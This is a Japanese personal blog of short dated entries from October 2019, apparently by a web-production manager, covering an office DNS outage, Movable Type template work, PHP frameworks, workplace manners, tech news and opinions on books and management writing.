2019-10-09ただ、そういうガサツな振る舞いをせざるを得ない事情の人がいるかもしれないという想像はする。たとえば、僕はいまでこそ老眼鏡を使っているが、これまで近くも見えていたし、視力は 2.0 前後で眼鏡を全く使っていなかったから、ものが見えていない人たちが予防的に行うような所作がありうると想定するのが難しい。物を乱暴に置くという所作にしても、視力が 0.5 もない人にとっては、ちゃんと物が置けたかどうかを音だけで判断している可能性がある。僕らのように視力が良い者の感覚からすると、そういう人々は視覚障碍者に近いと言ってよく、それなりに配慮する必要はあるのかもしれない。なので、そういう人々に文句を言ったり改めよと言うつもりはない。僕の感覚が何らかの障害に類するものであるなら、このようなケースは(敢えて《障害 vs. 障害》とまで言う必要はないと思うが)双方ともに生理的な所作や反応の調整ということになり、どちらにとっても難しいだろう。

2019-10-09子供の頃からガサツな人物の所作というのが苦手だ。たぶん、僕自身に多少の発達障害みたいな傾向があるのだろうと思うが、テーブルに乱雑に物を放り出して置くような音を聞かされると、ウンザリしたりムカムカする。当然、僕は物心がついた頃からコップやカップの類を置くときは小指で手を支えながら縁の一部を接地させて音を立てずに済ませるという所作を教えらえてきた結果、それしかできなくなっている(コップなどを直に平面に置くという動作が生理的にできなくなっている)。また、これは僕が自分でも子供の頃から力が強いという自覚をもっているからでもある。こういう所作が身に着いていない頃は、よく物をあちらこちらにぶつけては壊していた。そういうわけで、当社にも営業かクリエイターかを問わず振る舞いの雑な人間が何人かいて、扉を思い切り強く開けたり(反対側に人がいたらどうなるのか想像しないのだろうか)、西部劇の映画で酒場のテーブルに馬の鞍を放り投げる流浪のガンマンさながらといった様子だ。自意識プレイなのかどうかは知らないが、いまどき(というか元々)女性がそんな様子を見て母性本能を起こしたりうっとりするなんてことはないだろう。

2019-10-09既に導入された情報処理安全確保支援士の資格を維持するのに研修などで何万円もかかるという点について、かつて Twitter で辻伸弘さんのようなセキュリティ技術者も一緒になって、どうにかならないのかと意見を書いたことがある。とにかく、資格だとか会費だとか、一定のブランドを維持するためのコミュニティにとどまるには、コストがかかるというものなのだろう。もちろん、そもそもカジュアルな人々を簡単に招き入れないための障壁という意味もある。IAPP のメンバーシップも、実務家が個人として入会するには年額で $270 もかかる。おおよそ3万円だ。学術団体ですら、こんな金額を要する学会はなかなかないだろう(日本科学哲学会は 6,000 円だ)。仮に僕の年収が 1,000 万円だったとしても、メリットと比較考量すると、こんな金額は出せない。それに、海外の資格をもっていて意味があるのは、その手の茶飲み仲間が多い都内の IT ゼネコンだけだ。大多数の中小企業どころか多くの大企業でさえ、こういう資格は国内では何の効用もないし、それどころか箔がつくわけでもない。加えて、こういうコミュニティに入ったからといってグローバリゼーションに対応できる保証など何もないのである。International Association of Privacy Professionals

2019-10-09いまのテナント・ビルへ移転してきた際に持ち込んだ段ボール箱を放置して5年ほど経過する。中身が何なのか分からないものを放置するのも変な話なので、さきほど全て開いてみた。なるほど、昔の案件の資料(それこそ「さよなら0系新幹線」のサイトとか)が色々と出てきたし、こんなものを買ってたのかと思うような本もあったので、それなりに収穫はあった。しかし、「それなり」を除く大半は既に廃棄したパソコンの取説やリカバリー CD などで、これもどうやって処分したものやら。

2019-10-09Android 用で使う「ライブ壁紙」のインストール・ファイル(.apk ファイル)を出力するツールだ。さきほど何枚かの画像を用意して、スライド・ショー形式のライブ壁紙を作ってみたのだが、ライブ壁紙をインストールしてホーム画面から自分で作ったライブ壁紙を選ぶと、それを有効にした直後にライブ壁紙がクラッシュしてしまう。これは不安定にもほどがある。Custom Live Wallpaper Creator

2019-10-09確率論の歴史的な研究で知られる安藤洋美さんが中学レベルの数学について興味深い本を書いている。ご本人には失礼かもしれないが、トイレに持ち込む読み物として楽しく目を通しているのだが、読んでいて改めて気づくことがあった。単純な話で、単位というものが正確かつ客観的な基準で定義されていれば、表現がどうであろうと、それが示す対象としての数は同じである。もちろん、これは時代や地域を違えた度量衡の単位どうしの変換が保証されるには必要な前提だ。"I" と書こうが "1" と書こうが "one" や "壱" だろうが、それらが指し示す数は同じである。そして、仮にそのような表記や言語が存在していなくても、一定の長さや個数がある対象はそのままであり続ける。

2019-10-09何にしても、DNS サーバをサービス運用するにあたって、局社内で電源などを定期点検する際に回線の切り替えを間違えるというミスは頻繁に起きていて、こういうことを想定してプライマリとセカンダリを別の局舎や別の国の IDC に設置するのが当たり前だ。両方が同じ単一障害点によって落ちるなどというデプロイメントは、経路分散という(インターネットに限った話ではなく)通信の(それなりの予算があれば実行可能な)ベスト・エフォートというか、殆ど原則と言ってよい仕様を理解していない証拠であり、同じ局社内で両方の DNS サーバを運用するていどの投資しかされていない DNS サービスに業務用の通信コンフィギュレーションを依存させるのは非常に危険である。よって、少なくとも僕のマシンの DNS は(良し悪しの議論はあるが)CloudFlare(1.1.1.1)と Google(8.8.8.8)の public DNS に変更する。(当社の正式な設定は、もちろん自分で DNS を選択したり管理するスキルなどあるわけないから、「自動」つまりアルテリアネットワークス=USENの DNS だ。)

2019-10-09出勤したら、LAN 内のファイル・サーバや勤怠管理システムにはアクセスできるが、リモート・サーバ(ChatWork とか Desknet's とか Google とか)にはアクセスできなくなっていた。Fortigate の負荷が高いわけでもなく、ネットワークのトラブルシューティングの結果では、どうやら DNS サーバへ到達していないようだ。そのため、DNS サーバの設定をプライマリだけ ComodoDNS(8.26.56.26 – 8.20.247.20)から CloudFlare へ変更したら、問題なくアクセスできるようになった。(そもそも、アクセスできるようになっていないと、この投稿を PHP の FTP 関数でウェブ・サーバへ転送できないはずなので。)Cybersecurity Solutions to Disarm Cyberattacks | Comodo Cybersecurity

2019-10-08古本の検索サイトである「スーパー源氏」にも言えるけど、売れてしまって注文できないような本を検索結果に表示するのは、利用者に反感を与えるだけだと思うんだよね。見た目はたくさん売っていそうに見えても、たいていは「この商品は売り切れました」と書かれていては、注文する本があるかどうかを再び検索結果から探さないといけない。商品に「売れた」と表示できるということは、個々の商品に《売れた》という属性を付与する機能があるのだから、《売れた》という属性をもつ商品を除外して表示するのが正当な検索結果というものだろう。無い商品を検索結果に並べて、いったい何の意味があるのか。たまたま同じ商品が、その特定の古本屋に入荷するのを待てというのかな。古本屋って、はっきり言って横断検索ができる現代においては、そんな商売じゃないだろう。大昔なら、『やちまた』にも描かれていたように、懇意にしている古本屋さんへ頼んでおけば探してくれたりしたんだろうけど、いまどきそんなことをいちいちやる店があるのか。

2019-10-08近刊の文庫についてアマゾンのリストを見ていると、故野田又夫氏訳の『方法序説・情念論』が中公文庫で再刊されるらしい。それはそうと、氏名に「~氏」をつけるのはいいとしても、亡くなると「故」もつけなければ誤解を招くため、どうしても前後に言葉を繋ぐことになってしまう。さて、既に『方法序説』は谷川多佳子氏が岩波文庫で新訳を出しているし、他にも色々な出版社から数多くの訳本が出ている。もちろん、こんな短い訳本を何種類も出したところで、それらの違いを参考にできるのはプロパーだけである。多くの人にとっては、あんな短い読み物を読んでも、元マッキンゼーの二流コンサルが暇つぶしに書く自己啓発本を読む経験と、効用は殆ど変わらないと思う。単に「古典」と呼ばれている本が何度も読み返されたり、あるいはハロー効果で含蓄があると思い込んで読む人が多いせいで、自己啓発本よりも(もちろんそうなのだが)価値があるかのように判断されるだけのことでしかない。つまり出版社にしてみれば、哲学書の訳本を出すという事業は、自己啓発本を売りさばく事業と、結局は同じである(そして、出版が一つの事業であるからには、そうである他にはない。僕はそういう事業を軽蔑したり忌み嫌っているわけではない)。僕が言いたいのは、後続の訳本が先行する訳本の解釈を正確に踏襲し、更に現行までの研究成果を加味しているなら、その日本語表現そのものに哲学とは無関係なクオリア的な愛着があるなら仕方ないが、それ以外に利点がないのであれば、われわれは先行する業績を称賛して何らかの仕方でアーカイブしつつ、後続の業績に場所を空けて市場からは退かせなくてはいけないと思う。もちろん後続の翻訳が先行する翻訳に比べて、どれほど現代語訳として読みやすかろうと、学術的に評価できないような代物であれば、そんなものを優先する必要はない。こんなことは素人でもわかっているとは思うが、いわゆる超訳などというものは古典にヒントを得た自称訳者のデタラメな翻案やエッセイにすぎない。

2019-10-08定期的に見てるけど、あいかわらず東アジアの辺境地帯では留学生や外国人エンジニアですら chapter を設立しようという人はいないようだ。英語で発表するのが難しいなら、こんなイベントは取りまとめ役だけが英語で本家とやりとりできればいいのだから、local chapter での発表は現地語でいいと思うし、日本語で書かれた優れた論文を紹介してもいいだろう。https://paperswelove.org/

2019-10-08うちの会社は文房具の備品が相当に貧弱で、クリア・ファイルくらいはあるが、ファイリングの道具は必要になるたびに総務へ依頼して、アスクルに注文している。殆どの作業がパソコンで完結するという事情はあろうし、これはこれで無駄な経費がかからないのだから良いことではあるが、もちろん全てパソコンで何から何まで済むわけでもなく、必要なものもある。その筆頭は、セロテープだ。昔からうちの会社はセロテープを常備していない。なので、面倒だからダイソーで私的に買ったインデックス・シールをテープの代用としている。640枚も入っている安価なシールだから、こういう用途で使っても特に勿体ないとは思わないし、わざわざ注文してまでセロテープを買うのは、いつも面倒臭い。というか、もうダイソーでテロテープを買えばいいのだ。(アホみたいだが、いま書いてて思った。)

2019-10-08I think that a familiar writing of popular book is just a feeding of masticated foods for cheepers which cannot imagine, infer, or reason things themselves. An easy philosophy book is a dope of thought. However I dislike a lot of unnecessarily difficult, made-up, and weird words in philosophy books, typically as cracks love using them in their blog entry or independent publishing to disguise their poor philosophy.

2019-10-08なんでだったか脈絡は忘れたが、経営会議で遥洋子という人物が話題になったとき、この人が西川のりおと出ていた番組名を間違えた。『エンドレスナイト』じゃなくて、『今夜なに色?』だった。いずれにしても、副社長に「何年前の話やねん、それ」と突っ込まれる他はなかったわけだが。35年くらい前かな。

2019-10-089月の初旬に Google が公開した差分プライバシーのアルゴリズムだという。これを Google Maps など自社のプロダクトに適用するという話のようだが、そんなもの何の保証もないわけで、こういう場合にソース・コードを公開する意図というのは、(1) 法的な問題が起きたときのためのアリバイ工作、(2) 欠陥を無料で見つけさせる、(3) フェイント、だろう。google/differential-privacy

2019-10-08プロフィールに "he/him/his" という記述を見つけて由来を調べたら、「自分をどういう三人称で呼んでほしいか」を表明するための表記だという。もちろん、外見は女性でも "he/him/his" と呼ばれることを求める人もいるし、ここ数年の傾向として "they/them/their" と neutral に呼んでほしいと望む人もいる。https://www.bottomline.org/content/support-gender-inclusive-pronouns

2019-10-08昔は、テンプレートでヘッダーやフッターを共通のファイルとして読み込んで出力しているという実務や目的をぜんぜん理解しないで、コーディングするたびに「今回はコードをこう変えてみました」とか平気で言うデザイナーやコーダがいたんだよね。ここのところようやく、自分でもテンプレートを使ってプライベートなブログを運営したり、テンプレートを作ってみた経験を積んだのか、さすがにテンプレートを共有している意味を理解しないで勝手に共通部分を書き換えるような人はいなくなった。しかし、それが分かっていて「すべてのページに新しいテンプレートを適用する」ということを意図して書き換えていながら、そういう作業をして共通テンプレートを書き換えたという事実を、テンプレート化して実装する側の人間に言わないコーダとかがいたりするので、まだまだ油断はできない。

2019-10-08某大学の Movable Type 案件は、新着情報というブログのカテゴリーを二つだけ増やすという作業が進行中である。ただし、テンプレートとしては個々の記事のページはもちろんのこと、カテゴリーごとのインデックス・ページを出力して、学部のトップ・ページに読み込むためのヘッドライン(3記事ぶん)を PHP ファイルとしても出力し、それからカテゴリー単位のアーカイブ・ページも出力するという仕様になっている。カテゴリーごとのインデックス・ページは、異なる階層のディレクトリにあるページとして表示するため、出力したページのソースをまるごとインクルードして吐き出してもらうようになっている。したがって、そのページだけは全てのローカル・ファイルへのパスが絶対パスで書いてもらうようにしている。もちろん、これはクライアントの担当者には面倒な話なので、実質は弊社がサイトのコンテンツを更新しているから、ディレクターに説明すればいいというだけのことなのだが。現在、こちらで独自に作業できる追加作業は全て完了しており、あとはコーダからカテゴリーごとの HTML ページが出来上がってくるのを待って、Movable Type のテンプレートとして登録しなおすだけだ。

2019-10-08今年でウェブ制作の業界に20年くらいいることになるが、そのあいだに若者の世相とか何とか色々と変わって来てると言われながらも、結局は大して変わってないことも多いように思うんだよね。たとえば、来客があると、決まって女性にお茶を出させようとする。これは僕らのような年寄りだけではなく、20代のディレクターや営業ですら、そういう感覚の人間が《男女を問わず》(女性も若手の女性にお茶を出させようとする)いつでもいる。僕はダイバーシティだ男女平等だと、いちいち言われるよりも前から、自分の来客にはなるべく自分でお茶を出すようにしているつもりだ。時刻が分かっていれば、あらかじめ会議室に出しておくこともある。だいたい、役職者がそういうことを自分でしたら沽券にかかわるとか、ガバナンスが弱いと舐められるとか、そんなのは自意識過剰である。他人にお茶を出させるといったしょーもないことで維持するしかない自意識など、ビジネスの現実においては捻りウンコていどの価値もない。あと、これもどこで覚えてくるのかしらないが、管理部門の人間にお茶を出させようとする人がプロフィット部門に多いのも昔から変わっていない。財務や総務というのを、雑用係か何かと思っているのだろう。しかし、そもそも来客は他の部署にとっては何の関係もないことであり、自分の部署で手が空いている人、昼休み以外はイヤホンをしたまま電話にすら出ないデザイナーだろうと、そういう人たちから選んで任せるのが企業組織の原則だ(「俺ってば、クリエーティブのために入社したんだしぃ、みたいな」とか言ってるやつに限って、はっきり言うけどデザイナーやコーダやディレクターとして大したことないんだよ、実際)。ただし役員や部門長が応対する重要な顧客、たとえば株主とか広告代理店の局長級以上とか、そういう重要な来客には、特定の部署だけの話ではないからこそ管理系の部署が対応しているのである。

2019-10-08Livedoor ブログって、ブログのホスティング・サービスのくせに、RSS も配信してないのかと思った。調べてみると、手動で URI をポイントして購読しないといけないらしい。サイドバーに自動でアンカーくらい出力してくれよ。ブログのRSSフィードについて : ライブドアブログのヘルプ(PC向け)

2019-10-08Ergodox EZ は、一式で4万円弱というお値段だ。エルゴノミクスと称される、左右が分離したタイプのキーボードは昔から色々と出ているのだけれど、僕は使ったことがない。ヨドバシとかでも殆ど置いてないから、使い勝手が分からないので、安物でもオンラインで買ってみる気にはなれないんだよね。トラック・ボールで何度か失敗してるし。Ninja Speed Vim-like Debugging with Ergonomic Keyboard and Trackpad

2019-10-08Alice と Bob のアバターが事務員っぽくて好き。Elliptic Curve Cryptography Explained

2019-10-08Apple が、なんで中国にこれほど弱いのか。まぁブラック工場の多くが中国にあるからだろう。最近、Apple の製品はパソコンでも携帯でも昔に比べて安くなってるけど(昔は Apple のパソコンなんて PC の3倍くらいするのが相場だったはず)、それは中国で低賃金の労働者を使ってるからだとも言える。そして、このほど中国での売り上げを回復した裏には、大規模な減税という措置もあったようだ。国旗の絵文字を削除することくらい、それに比べたら些末なことなのだろう。そして、ジョブズ信奉者には気の毒だが、Apple に限らず「企業」と名の付く組織は昔からこうなのだ。What's difficult when it comes to global politics and a superpower like China is that the choices don't look great - no matter which way you look at them. While Apple has not made comment on this change, it seems entirely consistent that a decision such as this wouldn't have been made lightly.Apple Hides Taiwan Flag in Hong Kong

2019-10-08ただでさえ Who to follow は目障りなのに、日本人となるとガキの起業家や芸能人ばかりなのは、いい加減にどうにかしてくれと思う。まるで「小学生にもよくわかる、目で見る国別民度」とかタイトルを付けた教材のようだ。そしてDR戦争がどうとか素人臭い(中二病とすら呼んでいいような)ジャーナリストがおすすめユーザに頻繁に出てくるのは、これも Twitter かアドネットワークにお金払ってるんだろうけど、個別にブロックするのは面倒臭い。どうにかしてほしい。あと、僕の書いている内容が(全て英語だけど)保守的と判断されて読売新聞とかをフォローするように勧められるのは分かるとして、例の「旧皇族」のネトウヨ兄ちゃんを勧められるのは、仮に僕が保守だとしても心外だね。そろそろ保守思想というのを頑迷な無知無教養の代名詞みたいにマスコミから扱われるのはどうにかしたい。

2019-10-08互換シェルの話を書いたついでで DarkStep に関連するページを調べてみると、リード開発者だった Fahim Farook のサイトしか残っていない。Tripod に幾つかのバイナリと readme があったので、これらは利用させてもらう。他に、deviantart.com とかにテーマはあるようだが、まぁこれは LiteStep で使ってるものを流用してる場合が多いし、正直なところ(もちろん僕自身が過去に公開したテーマにも言えるが)些末過ぎて取り上げる気にならない。そういや、僕はフランスの若者が開発していた OpenVision という互換シェルのロゴとキー・ビジュアルを担当するメイン・デザイナーだったのだが(自分でも忘れてた)、このプロジェクトは他の多くの alternatives と同様に早々と頓挫してしまった。

2019-10-08Twitter で @philsci を持っていた頃は、2010年前後に相当な頻度でツイートしていた。かつては MarkupDancing でログも公開していたし、既に10年ほど前のことなので、改めて公開してもよかろうとは思う(不適当と思われるツイートは、ログをサイトで公開するときに再編集したり削除してある)。しかし、更に見直してからの方がいいかもしれないので、これも長期の休暇に作業することとなる。いまのところ、ここで明言してから公開が完了していないコンテンツとして、『やちまた』の簡易人名索引と、中小企業向けの GDPR 対策という論文の翻訳が控えている。これらが終わったら、次は古いログの見直しだ。あと、昔のコンテンツが Wayback Machine にすら残っていない(というか URL やドメインを知らなければ検索しようがないし)、互換シェルに関連するコンテンツのアーカイブだ。他人のサイトを勝手に当サイトで公開するというわけではなく、彼らが公開したプログラムは OSS に準じて distribution できる筈なので(もちろんそれぞれ確認はするが)、これらを GitHub のリポジトリにでも追加したい。

2019-10-08なお、Orchis の設定でボタンを押し続ける時間は最短にしてあるし、僕のクリックの速さは人並みなので、僕のクリックが遅いとか速いとか、そういう問題ではない。クリックしてボタンを押している継続時間がゼロということは、押すだけでクリックと見做されるということだ。遅いも速いもないのである。

2019-10-08自宅でも同じなのだが、どうも Orchis のウィンドウがダブル・クリックでは反応しないことが多くて腕に負担がかかるため、設定でダブル・クリックだけではなくクリックだけでもウィンドウがポップアップするように変更した。シングルのクリックでは不都合があると思ってダブル・クリックにしていたのだと思うが、いまとなっては理由が思い出せないし、シングルで開いても特に問題がありそうに思えない。他に、ポインタを画面の左端中央へ当てたときに開くようにしてあるのだが、これは 4K モニタを使っている会社のマシンだけの都合だ(例の、Firefox のウィンドウが起動するたびに下へ伸びてゆく問題があって、常に全画面にしなければならず、クリックする有効領域が確保できないからだ)。

2019-10-07経営学やマネジメントに関連する本というものは、もちろん素人が書くものにせよ大学の教員が書くものにせよ、十分な数で正確に記録された実例にもとづく成果ではない。早い話が学者だろうと経営者だろうと上場企業の元役職が書くものであろうと、それらの大多数に「科学的」な根拠というものはないのである。したがって、或る人物が「マネージャたるもの、他人を変えてこそナンボだ」(いわゆるエンゲージメントやコア・コンピタンス経営や下からの改革、ボトムアップのマネジメントなどなど)と言ったり、別の或る人物が「マネージャたるもの、自分を変えてこそナンボだ」(いわゆるサーバント・マネージャ、トップダウンのマネジメントなどなど)と言ったりする。なんでこんなことになるのかと言えば、もちろん経営者も、管理職も、従業員も、そして取引相手や顧客も、それぞれが《違う》し、それぞれが置かれた状況も外部環境も《違う》からだ。違うからこそ、或るポリシーがうまくいかなくても、いくらでも言い訳できる。それゆえ、経営書や経営コンサルタントや経営学は、はっきり言って占いと大差ないと言われるのである。たとえ、その人物がマッキンゼーのコンサルだろうと、ハーヴァードの人気教授だろうと、Google や Apple でメンターをした伝説の人物とやらであろうと、山師でないという保証は殆どないのである。ただ、彼らの書くものは読み物としては面白いし、個々のケース・スタディとしても興味深いのは確かだ。よって、経営書や経営学の概論や経営コンサルの啓発書というものは、それが誰の手によって何冊売れたのであれ、基本的にはファンタジー・ノベルだと見做して相対するのが科学哲学者としてのまともなスタンスである。

2019-10-07うーん。とにかく老眼になるとニッパーの先端の金属が爪を反射している様子が見え辛くなり、どこが爪の先でどこがニッパーの刃なのか分からなくて、単純に怖い。風呂から上がると、爪ヤスリで削るよりも前にニッパーで大まかに爪を切っておきたいとは思うのだが、爪を切り難くなってしまうと、嫌でも何でも爪やすりを使わざるを得なくなるのだ。黒いニッパーも売っているようだが、切れ味や梱包時の品質管理に問題があるらしいから手が出ない。というか、そろそろニッパーを全く使わないスタイルへ移行したい。

2019-10-07PHPのフレームワークを「2018年版」として紹介する記事らしいが、おかしな日本語が散見されるのと、既に2018年の時点で開発がストップしている Ethna や Kohana を候補に挙げているところなどを鑑みると、恐らく海外の人が5年くらい前に書いた記事を自動翻訳に通したコタツ記事だろう。もしそうではないというなら、「株式会社ITプロパートナーズ」とかいう、いかにも人材派遣だけでスキルのない連中の社名らしい文言だが、いずれにせよ、こういう素人はいい加減にウェブ制作やオンライン・アプリケーション開発の業界から出て行ってもらうか、技術にかかわるデタラメな記事など書かずに慎ましく下請けや人身売買や口利きやってろって話だ。下衆が。【2018年度版!】おすすめPHPフレームワーク10選 | アトオシ

2019-10-07神戸市で、セネガル出身の父親が母国の習慣として幼児にピアスを付けたところ、幼稚園から入園にあたっては外して登園するようにと要求されて、入園を諦めたという話があったようだ。Twitter では、例のネトウヨ芸で食ってるらしいエジプト人女性を始めとして「郷に入りては云々」というクソみたいなフレーズの大合唱だ。まったくもって、ちょっとでもマウンティングできるフレーズを日本語のリテラル・データとして記憶していたら、ロボットよろしく機会を見つけては幾らでも繰り返すのが日本の(もちろん一部だが)民衆なり凡人である。たとえばさ、おまえたちのバカヅラをスキャンしたパターン「A」と比べて、日本に同じパターンを共有する人間が100人ほどしかいないとしよう。そして、どういう理由からか「A」というパターンの親をもつ子供は幼稚園への入園を拒否しますと言われたらどうするね? 今回は他の子どもが危険だとか、やれ保険業界ではピアスなど論外だとか、たまたま明白な理由があるらしいけれど、いつもそうだとは限らないのが、東アジアの海に浮かぶ辺境国家だ。

2019-10-07何ヶ月か前から歯茎の根元あたりが腫れてきていた。近くに10年くらい通ってブリッジを造ってもらった歯科医院はあるのだが、そこは小児科・歯科で口内外科がないため、念のため出勤する途中で大阪歯科大学へ立ち寄って診てもらうことにした。大阪歯科大学附属病院では、初診の患者がどこの科目に該当するかを振り分ける診察をする。いきなり行っても紹介状は不要だし、紹介状がないと 5,000 円くらいを問答無用で払う病院が多い中、ここはそういう「礼金」というか「初診迷惑料」みたいなものもないので良心的である(ない病院があるということは、制度的に必須ではないのだから、要するにその手の料金を請求している病院には、それだけの理由があるのだ)。そして、初診で診てもらい、レントゲンまで取ってもらったら、これは処置済の歯が傷んでいて根元に炎症が起きているからだと即答された。奥歯なのか、一本だけ手前の歯なのかは微妙な位置だが、いずれにしても歯の治療せよと言われて、再び近くの歯科医院で治療しなおしているところだ。

2019-10-07中国の人って、こういうことをまじめにコツコツとやる人がいるよね。他方で、他人の生活などおかまいなしという人もいる。これだけ人口が多いのだから当然と言えば当然なのだけれど、日本も実は似たようなものなのだ。A Chinese farmer has won the first round of a legal battle against a powerful state-owned chemicals corporation, after spending 16 years teaching himself about the law.Farmer spends 16 years studying law so he can sue corporation for dumping toxic waste on his land

2019-10-07Hacker News でトピックの voting が劇的に上昇している。何かと思えば、いわゆるダイバーシティ事案だ。もっと正確に言えば、性別を特定しない singular they のような表現について、Stack Exchange が曖昧な態度を取り続けたことに端を発したトラブルのようだ。https://cellio.dreamwidth.org/2064709.html のようなタイムラインを見る限りでは、かなり前からの問題だったように思える。First of all, we hurt members of our LGBTQ+ community when they felt they couldn’t participate authentically and we didn’t respond quickly or strongly enough in supporting them. Worse, through our handling of this situation, we made them a target for harassment as people debated their right to express themselves and be addressed according to how they identify.https://meta.stackexchange.com/questions/334551/an-apology-to-our-community-and-next-steps

2019-10-07現在のテナント・ビルへ事業所を転居したときに運び入れた段ボール箱のいくつかは、いまだに自席の後ろにある作業机の周辺に積み上げたままになっている。中身は詳しく覚えていないが、使わなくなって返却もしてない iPhone とか、昔の業務パソコンの取説とか、色々と面倒臭いガラクタがたくさん入っている。でも、放置しておくのもおかしな話だし、作業スペースが減ってくるのは困るので、何度かに分けて整理することとした。さきほど箱を二つほど開けてみると、Ethna に関連する資料が見つかったので、下のようなことを書いたわけだ。そして他にも、平成19年2月に実行する予定だった株主総会の招集通知だとか決算報告書が出てきた。ちょうど現任の取締役が交代する時期だったため、既に何年も前に退職した、当時は制作部門の部長をやっていた情報アーキテクトの O 君と、システム部長だった僕が新しい取締役として選任される予定だったのだが、僕は既に当サイトで「西新宿案件」と呼んできた開発案件で火だるまの状態だったことと、恐らくは全ての株主から委任状が送られてきたという事情もあってか、株主の前で自己紹介するといったイベントはなくて取締役に選任されたのだと思う。というか、株主が出席していないからと言って、株主総会を開かずに議案を勝手に実行する株式会社など、いくら中小零細でも会社法違反である。そして、形式的でも議案が承認されたからこそ、ひとまず「取締役」の名刺を持って東京へ行ったり電通の人たちと名刺交換していたわけだ。ただの形式だけで、そんな重大な肩書の名刺を勝手に使わせる会社などない。

2019-10-07もう7年くらい前に開発が止まっていたとは知らなかった。当時からも lightweight なフレームワークは百花繚乱といった感じだったが、CodeIgniter (Kohana) を使い始めてから他のものは殆ど使わなくなった(仕様として要求されることもなかった)ので情報も大して更新していなかったら、こんなことになっていたのか。Ethna (えすな)は、PHPを利用したウェブアプリケーションフレームワークです。http://ethna.jp/doc/

2019-10-07ようやく弊社でもオンライン・サービスの新規営業担当者を二人ていどに減らした。それまで、オンライン・サービスなのにオンラインで成約できなかったため、最大では20名くらいの自社営業と、各地方の媒体各社に兼任で営業を担当する人たち(もともと新聞社やテレビ局の人たち)が、それこそレンタカーで走り回って紙の契約書に判子をついてもらうという、昭和50年代頃の営業活動を続けていたわけだ。人数が多いため、接客や架電でのプロトコルが決まらなかったり、営業によって違いがあったり、あるいは営業先とのやり取りの記録やフィードバックが正確に報告されていなかったり遅かったりと、とにかく自社の人間を管理するコストが大きくて、収益の大半を(もちろん人件費も含めて)そのような工数で浪費していたとも言える。僕と連れ合いは、逆にオンラインでしか成約しないサービスの会社にいたので、オンライン・サービスなのに最初からオンラインだけでマーケティングを設計できなかったのかと思うのだが、まぁ一緒に事業をやっている広告代理店や媒体各社との関係なり、地方の営業先がそもそもオンラインで契約するスキルをもっていないか疑っているという状況では、難しかったのだろう。そういう長期的な動向も含めて、不合理で非効率だと分かっていても何年も我慢しないといけないという事業もあるらしい。ウェブの制作にも言えるが、顧客の無知を非難していても金なんて儲からない。彼らは馬鹿なのではなく(もちろん本当のバカもいるが)、必要ないと思い込んでいることを学ぼうとしないだけであって、そういう意味では自分たちと同じ凡俗の一部にすぎない。

2019-10-07売れる家について理屈を知っていれば売れた筈の適正価格というものがあるなら、理屈を知ってる方がいいだろうけど、そもそも家の値段なんて、少なくとも自由主義の社会では買う人がいてナンボの話だからなぁ。「理論武装しましょう」とか言ってる不動産コンサルがいるようだけど、理屈を知ってるくらいで家を高く売れるなら誰も苦労はしない。

2019-10-07早くも PayPal がアライアンスから脱退。というか、決済の会社が他社の暗号通貨に乗っかること自体、ややリスキーな感じはするので、これは業界特有の事情による脱退かもしれず、アライアンスに入ってる他の30社近くまで続々と PayPal に続いてアライアンスから脱退するかどうかは、まだ分からない。ただ、GAFA は分割というアイデアが何度も出ているくらいだから、行政当局との関係がまずくなるような事態に引きずり込まれるのと、Libra に関わって収益を上げるのと、どちらを(株主が)評価するか。もちろん株主なんて金に決まってる連中だから、当局とはうまくやりながら(結局は)儲けるべきだと言うに決まっているわけだが。PayPal is backing out of the nonprofit governing Facebook’s cryptocurrency project, the company announced Friday.PayPal withdraws from Facebook's libra cryptocurrency

2019-10-07法事があるため、図書館へ行く日をずらしていたのを忘れていた。たまたま昨日が返却(延長)の予定日だと気づいたので、急いで延長の処理をとったのだが、あいにく連れ合いが借りている本は次の予約が入っていたため、日曜日中の返却は諦めて翌日に最も近くの市立図書館へ返却することとした。Microsoft To Do を使っていてこれなのだから、こういうものに頼りすぎると、そもそもスケジュールを登録していない事柄を全て忘れてしまう恐れがある。使うなら、どんな細かいことでも後で予定していることは全て書かないと危ない。もちろん、自分の葬式まで書く必要はないが、メンタルとしてはそこまで将来に起きることを気にして書き貯めておくくらいのつもりでなければ、結局のところ単なる記憶だけで予定を処理していくのと殆どリスクは同じになってしまう。

2019-10-06SNS に投稿するなら、そのていどのコードを決めるのはパートナー企業との関係で不思議なことではないと思う。あくまでも配慮してくださいというていどのことで、自由や人権が侵害されるみたいな妄想を抱いている人がいるようだけど、そもそもにおいて社会主義国家である日本を無自覚に維持しているような人間がいまさら何を言うのかという気がするね。組織委が募集した、競技会場や選手村などで活動する「大会ボランティア」の研修会場では、担当者が「私たち東京2020大会は多くのパートナー企業のご支援、ご協力で成り立っている組織でもございます。各パートナー企業への配慮を、ぜひみなさん、お願いしたい」と要請した。スポーツ飲料、投稿するなら配慮して 五輪ボラ研修開始:朝日新聞デジタル

2019-10-07SNS が有名人のセレブリティ増幅装置だなんて、たいていの人は自分が誰をフォローしてるか見てみれば一目瞭然だと思うんだよね。みんな自分がフォローしてるアカウントの一覧を見てみればいいけど、匿名のアカウントをフォローしてないでしょう? それが答えだよ。せっせと匿名のアカウントをフォローしてるのは、たいていは政治的な動機が理由で《同志》や《攻撃対象》をフォローしてるわけで、そんなことをしてるのは一部の変人だ。仮に大多数の人が匿名で書いてる人たちのツイートを眺めるとしても、たいていはリストに入れて ROM るだろう。あからさまにフォローなんてしないよねぇ。

2019-10-06共産党でもこういうのがいるわけで、まぁ政治家というのは政党に関係なく色々な人物がいる。[...] 報道陣の取材に応じた仲達市議は「旅行のために休むと言えば、他の議員からも『けしからん』と言われるだろうし、うそをついた方がいいと考えた」「退院証明書は実際、直前まで入院していたので、その時のものを偽造した」と説明。「ごまかして、ごまかして何とかならないかと思ってしまった。考えが甘かった。新聞に写真が載るとは思わなかった。隠し事はできないなと思った」と話し、謝罪した。仮病で議会休み豪華客船の旅 楽しむ姿が新聞に…辞職へ:朝日新聞デジタル

2019-10-05今日は四天王寺で古本市に立ち寄った。ただし、それほど長くは滞在しなかったので、1/3くらいの店舗をざっと見て、保育社のカラーブックスとか何冊か安いものを買ってきた。少し興味はあったものの買わなかった本として、『ソシアの錯覚』というのがあった。これは後から調べると「カプグラ症候群」として知られる妄想の一つなのだが、検索した結果は本の商品情報が大半で、ブログで紹介している事例の大半はウィキペディアの冒頭の段落ていどしか価値のない文字列であり、恐らくは SF 的な連想を起こしやすい症状のために好事家の興味を引き寄せるのだろうけど、好事家が関心をもつのは疾患と SF 的な設定との表面的なアナロジーにすぎないため、参考になるようなページは殆どない。

